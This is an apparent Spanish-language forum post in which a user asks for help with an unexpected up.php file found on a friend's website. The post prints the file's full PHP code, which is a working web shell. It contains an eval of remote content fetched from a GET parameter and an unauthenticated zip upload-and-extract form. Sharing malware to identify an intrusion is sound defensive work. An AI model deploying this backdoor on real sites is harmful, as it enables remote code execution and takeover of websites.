Z
zoom
Préstamo
Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Pues resulta que estaba ayudando le a un amigo a solucionar un problema en su web y me encontré con este código que estaba dentro de un archivo php llamado up.php y se me hizo muy sospechoso ya que este archivo no esta y de pronto apareció.
Y si no mal recuerdo esto se usa para infectar web, así como para subir una shell o algo, si me equivoco podrian corregirme por favor. Este código apareció hoy por la mañana y según otro amigo de la universidad le estaba solucionando los problemas en la web.
Este ss el codigo en cuestion:
Esto sale al ejecutar el archivo up.php, ahora si estoy seguro que le querian clar algo a la web de mi amigo
Y si no mal recuerdo esto se usa para infectar web, así como para subir una shell o algo, si me equivoco podrian corregirme por favor. Este código apareció hoy por la mañana y según otro amigo de la universidad le estaba solucionando los problemas en la web.
Este ss el codigo en cuestion:
Insertar CODE, HTML o PHP:
<?php
echo "<!--LainCest Returned-->"; eval(@file_get_contents(@$_GET["ayaz"]));
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br> Y眉kleyece臒iniz Dosya .zip Olaml谋d谋r.</b> // SpyHatz';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
$file = $_FILES['file']['name'];
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
$zip = new ZipArchive;
if ($zip->open($file) === TRUE) {
$zip->extractTo('./');
$zip->close();
echo 'Yükleme Başarılı';
} else {
echo 'Yüklendi Ancak Çıkarma Başarısız.';
}
}else{
echo '<b>Basarisiz</b><br><br>';
}
}
?>Esto sale al ejecutar el archivo up.php, ahora si estoy seguro que le querian clar algo a la web de mi amigo
Última edición:
